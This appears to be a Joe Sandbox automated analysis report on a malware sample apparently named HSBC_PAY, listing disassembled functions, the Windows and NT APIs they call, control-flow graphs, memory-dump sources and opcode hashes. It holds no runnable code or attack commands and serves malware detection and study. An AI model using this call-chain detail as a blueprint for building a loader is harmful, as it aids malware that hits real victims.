                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21516ba38a2ab146ec329f39d9bcffee05ef81e762c7479f4c9a0a674732a2c9
                                                                    • Instruction ID: 1ea0ef4f20f0ba1af6efc4fb8873011454cdfe6cf750ca7338aab423a7c08e9b
                                                                    • Opcode Fuzzy Hash: 21516ba38a2ab146ec329f39d9bcffee05ef81e762c7479f4c9a0a674732a2c9
                                                                    • Instruction Fuzzy Hash: 6BA1B2A67516004BE718BB7D9EC43BDB7C69B84325F18427EE21DCB281EF68C9538690
                                                                    Function 02A8946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02A8955A), ref: 02A894F2
                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02A8955A), ref: 02A894F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: DateFormatLocaleThread
                                                                    • String ID: yyyy
                                                                    • API String ID: 3303714858-3145165042
                                                                    • Opcode ID: 0608fdd769c4772638668b74257c18c178dd21dd21cb4f8a2a622704a640c625
                                                                    • Instruction ID: a33d57910ef66284394a7dc72d3c3e393f1688f07f3434ed4bf1aa03d9a96065
                                                                    • Opcode Fuzzy Hash: 0608fdd769c4772638668b74257c18c178dd21dd21cb4f8a2a622704a640c625
                                                                    • Instruction Fuzzy Hash: FC215C71A80219AFDB15EFA8C981ABEB3F9EF09710F5100A5E945E7340DA309E44CBA5
                                                                    Function 02A98184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A9820E), ref: 02A981F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                    • API String ID: 3811539418-184458249
                                                                    • Opcode ID: a227d8816c42214543360b8cd87dbc1dc8cf162e56569f686b1153bafec04531
                                                                    • Instruction ID: bf586ba75bf92e5a8f893bdcb2f3f50fb7c3ff32a212e611497e7862d668c7e6
                                                                    • Opcode Fuzzy Hash: a227d8816c42214543360b8cd87dbc1dc8cf162e56569f686b1153bafec04531
                                                                    • Instruction Fuzzy Hash: 42014B75A80605BFEF50EFA5DD41F5A77EDE749B10F5144A0B504D7A40DE38ED118B20
                                                                    Function 02A9AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9AD90
                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02A9ADC0
                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 02A9ADDF
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9ADEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Read$Write
                                                                    • String ID:
                                                                    • API String ID: 3448952669-0
                                                                    • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                    • Instruction ID: 6a6763f042cc059ec775e4548c79de309142161d899be528ff324b8a33b91972
                                                                    • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                    • Instruction Fuzzy Hash: BB2172B16403199BDF10DF6ACD81BAE77F9EF40751F008122EE5497341DF34D9119AA4

                                                                    Execution Graph

                                                                    Execution Coverage:0.9%
                                                                    Dynamic/Decrypted Code Coverage:5.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:133
                                                                    Total number of Limit Nodes:14
                                                                    execution_graph 93901 430063 93902 430089 93901->93902 93903 4300db 93902->93903 93906 429ec3 93902->93906 93905 430130 93907 429f21 93906->93907 93909 429f35 93907->93909 93910 417bb3 93907->93910 93909->93905 93911 417b81 93910->93911 93914 417bc6 93910->93914 93912 417b93 LdrLoadDll 93911->93912 93913 417baa 93911->93913 93912->93913 93913->93909 93914->93909 93915 425143 93919 42515c 93915->93919 93916 4251a4 93923 42ebe3 93916->93923 93919->93916 93920 4251e4 93919->93920 93922 4251e9 93919->93922 93921 42ebe3 RtlFreeHeap 93920->93921 93921->93922 93926 42ce73 93923->93926 93925 4251b4 93927 42ce90 93926->93927 93928 42cea1 RtlFreeHeap 93927->93928 93928->93925 93929 42fce3 93930 42ebe3 RtlFreeHeap 93929->93930 93931 42fcf8 93930->93931 93932 42fc83 93933 42fc93 93932->93933 93934 42fc99 93932->93934 93937 42ecc3 93934->93937 93936 42fcbf 93940 42ce23 93937->93940 93939 42ecde 93939->93936 93941 42ce40 93940->93941 93942 42ce51 RtlAllocateHeap 93941->93942 93942->93939 93943 424da3 93944 424dbf 93943->93944 93945 424de7 93944->93945 93946 424dfb 93944->93946 93947 42cb13 NtClose 93945->93947 93953 42cb13 93946->93953 93949 424df0 93947->93949 93950 424e04 93956 42ed03 RtlAllocateHeap 93950->93956 93952 424e0f 93954 42cb30 93953->93954 93955 42cb41 NtClose 93954->93955 93955->93950 93956->93952 93957 29012b60 LdrInitializeThunk 93958 429e23 93959 429e87 93958->93959 93960 429eba 93959->93960 93963 413e43 93959->93963 93962 429e9c 93964 413e0e 93963->93964 93967 413e52 93963->93967 93968 42cd93 93964->93968 93969 42cdad 93968->93969 93972 29012c70 LdrInitializeThunk 93969->93972 93970 413e25 93970->93962 93972->93970 93973 413fe3 93977 414003 93973->93977 93975 41406c 93976 414062 93977->93975 93978 41b793 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 93977->93978 93978->93976 93979 414083 93981 4140a9 93979->93981 93980 4140d3 93981->93980 93983 413e03 LdrInitializeThunk 93981->93983 93983->93980 93984 42c0f3 93985 42c110 93984->93985 93988 29012df0 LdrInitializeThunk 93985->93988 93986 42c138 93988->93986 93989 401af2 93990 401b20 93989->93990 93990->93990 93991 401bf3 EntryPoint 93990->93991 93992 401c20 93991->93992 93995 430153 93992->93995 93998 42e793 93995->93998 93999 42e7b9 93998->93999 94008 4075c3 93999->94008 94001 42e7cf 94002 401c2a 94001->94002 94011 41b483 94001->94011 94004 42e7ee 94005 42e803 94004->94005 94006 42cec3 ExitProcess 94004->94006 94022 42cec3 94005->94022 94006->94005 94025 4167e3 94008->94025 94010 4075d0 94010->94001 94012 41b4af 94011->94012 94043 41b373 94012->94043 94015 41b4f4 94018 41b510 94015->94018 94020 42cb13 NtClose 94015->94020 94016 41b4dc 94017 41b4e7 94016->94017 94019 42cb13 NtClose 94016->94019 94017->94004 94018->94004 94019->94017 94021 41b506 94020->94021 94021->94004 94023 42cee0 94022->94023 94024 42cef1 ExitProcess 94023->94024 94024->94002 94026 416800 94025->94026 94028 416819 94026->94028 94029 42d573 94026->94029 94028->94010 94031 42d58d 94029->94031 94030 42d5bc 94030->94028 94031->94030 94036 42c143 94031->94036 94034 42ebe3 RtlFreeHeap 94035 42d635 94034->94035 94035->94028 94037 42c15d 94036->94037 94040 29012c0a 94037->94040 94038 42c189 94038->94034 94041 29012c1f LdrInitializeThunk 94040->94041 94042 29012c11 94040->94042 94041->94038 94042->94038 94044 41b469 94043->94044 94045 41b38d 94043->94045 94044->94015 94044->94016 94049 42c1e3 94045->94049 94048 42cb13 NtClose 94048->94044 94050 42c1fd 94049->94050 94053 290135c0 LdrInitializeThunk 94050->94053 94051 41b45d 94051->94048 94053->94051 94054 41b673 94055 41b6b7 94054->94055 94056 41b6d8 94055->94056 94057 42cb13 NtClose 94055->94057 94057->94056 94058 41e873 94059 41e899 94058->94059 94063 41e996 94059->94063 94064 42fd23 RtlAllocateHeap RtlFreeHeap 94059->94064 94061 41e934 94062 42c143 LdrInitializeThunk 94061->94062 94061->94063 94062->94063 94064->94061 94065 4190f8 94066 42cb13 NtClose 94065->94066 94067 419102 94066->94067

                                                                    Executed Functions

                                                                    Function 00401560 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 561COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000001.1703200242.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_1_400000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                    • API String ID: 0-3667867154
                                                                    • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                    • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                    • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                    • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44
                                                                    Function 00417B33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 92 417b33-417b4f 93 417b57-417b5c 92->93 94 417b52 call 42f7c3 92->94 95 417b62-417b70 call 42fdc3 93->95 96 417b5e-417b61 93->96 94->93 99 417b80-417b91 call 42e263 95->99 100 417b72-417b7d call 430063 95->100 105 417b93-417ba7 LdrLoadDll 99->105 106 417baa-417bad 99->106 100->99 105->106
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                    • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                    • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                    • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795
                                                                    Function 0042CB13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 130 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                    • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                    • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                    • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4
                                                                    Function 29012B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 144 29012b60-29012b6c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1d0965cbb494b4d9e730c93b2f9ca924b77761d043ec683094a7efb3c11d7812
                                                                    • Instruction ID: 4cad67cd626ea88b8e85bb3db06deb6c02123eb3a619b87493ae27155cb9157e
                                                                    • Opcode Fuzzy Hash: 1d0965cbb494b4d9e730c93b2f9ca924b77761d043ec683094a7efb3c11d7812
                                                                    • Instruction Fuzzy Hash: 7A90026560280403510572584455616400E47F0201B55C422E5014590DC92589926169
                                                                    Function 29012DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 146 29012df0-29012dfc LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b48930912042317f71198dfab4db679f4974fb1017905f75d6b615a5db4e07ad
                                                                    • Instruction ID: 245b65d902873af16095130b73ee809b0a31467fc63956a7b6f217b68aa656c4
                                                                    • Opcode Fuzzy Hash: b48930912042317f71198dfab4db679f4974fb1017905f75d6b615a5db4e07ad
                                                                    • Instruction Fuzzy Hash: 2190023560180813E11172584545707000D47E0241F95C813A4424558D9A568A53A165
                                                                    Function 29012C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 145 29012c70-29012c7c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: db13492cdc4d5d00e215461afff3f51cc1194bc41ba73a97a552b25f653af07d
                                                                    • Instruction ID: 5f0b18d88cf62b8a5d9fda7ac279c5b4b9debaca8d3d47c5c37d4c1d67d3aa08
                                                                    • Opcode Fuzzy Hash: db13492cdc4d5d00e215461afff3f51cc1194bc41ba73a97a552b25f653af07d
                                                                    • Instruction Fuzzy Hash: 8590023560188C02E1107258844574A000947E0301F59C812A8424658D8A9589927165
                                                                    Function 290135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2a27ee2774d27cbaa5675d52f47997a3bf85ece7e6b56ae1ff372ae95d9b71ed
                                                                    • Instruction ID: d074363e30cbda547b3d45d61547e4a15022fa897e6fea2a9a5c86da9f1c9bb9
                                                                    • Opcode Fuzzy Hash: 2a27ee2774d27cbaa5675d52f47997a3bf85ece7e6b56ae1ff372ae95d9b71ed
                                                                    • Instruction Fuzzy Hash: 84900235A0590802E10072584555706100947E0201F65C812A4424568D8B958A5265E6
                                                                    Function 00401AF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 401af2-401b18 1 401b20-401b33 0->1 1->1 2 401b35-401b51 call 4010e0 1->2 5 401b56-401b5c 2->5 5->5 6 401b5e-401b82 call 401d70 5->6 9 401b87-401b8d 6->9 9->9 10 401b8f-401b9e 9->10 11 401ba3-401ba4 10->11 11->11 12 401ba6-401bab 11->12 13 401bb0-401bc1 12->13 13->13 14 401bc3-401bd8 13->14 14->14 15 401bda-401bdf 14->15 16 401be0-401bf1 15->16 16->16 17 401bf3-401c19 EntryPoint 16->17 18 401c20-401c26 17->18 18->18 19 401c28 call 430153 18->19 20 401c2a-401c2d 19->20 21 401c32-401c45 20->21 21->21 22 401c47-401c4c 21->22 23 401c50-401c61 22->23 23->23 24 401c63-401c78 23->24
                                                                    APIs
                                                                    • EntryPoint.UZONFNTK(?,0000032C,?), ref: 00401BFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EntryPoint
                                                                    • String ID: a```
                                                                    • API String ID: 3225343992-3259403941
                                                                    • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                    • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                    • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                    • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84
                                                                    Function 0042CE73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 26 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: whA
                                                                    • API String ID: 3298025750-33568622
                                                                    • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                    • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                    • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                    • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9
                                                                    Function 00417BB3 Relevance: 1.6, APIs: 1, Instructions: 105libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 70 417bb3-417bc4 71 417b81-417b83 70->71 72 417bc6-417bd3 70->72 73 417b89-417b91 71->73 74 417b84 call 42e263 71->74 75 417bd5-417bd6 72->75 76 417bd7-417bde 72->76 77 417b93-417ba7 LdrLoadDll 73->77 78 417baa-417bad 73->78 74->73 75->76 79 417be1-417be7 76->79 77->78 80 417be9 79->80 81 417bed-417bf5 79->81 82 417bea 80->82 83 417c5f-417c64 80->83 84 417bfa-417c03 81->84 82->84 88 417beb-417bec 82->88 86 417c41-417c55 83->86 87 417c66-417c6f 83->87 84->86 86->79 89 417c57-417c58 86->89 90 417c71-417c91 87->90 88->81 89->90 91 417c5a-417c5e 89->91 91->83
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                    • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                    • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                    • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5
                                                                    Function 00417B27 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 107 417b27-417b30 108 417b90-417ba7 LdrLoadDll 107->108 109 417b32-417b5c call 42f7c3 107->109 110 417baa-417bad 108->110 114 417b62-417b70 call 42fdc3 109->114 115 417b5e-417b61 109->115 118 417b80-417b91 call 42e263 114->118 119 417b72-417b7d call 430063 114->119 118->110 124 417b93-417ba7 LdrLoadDll 118->124 119->118 124->110
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                    • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                    • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                    • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756
                                                                    Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 125 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                    • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                    • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                    • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9
                                                                    Function 0042CEC3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 135 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                    • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
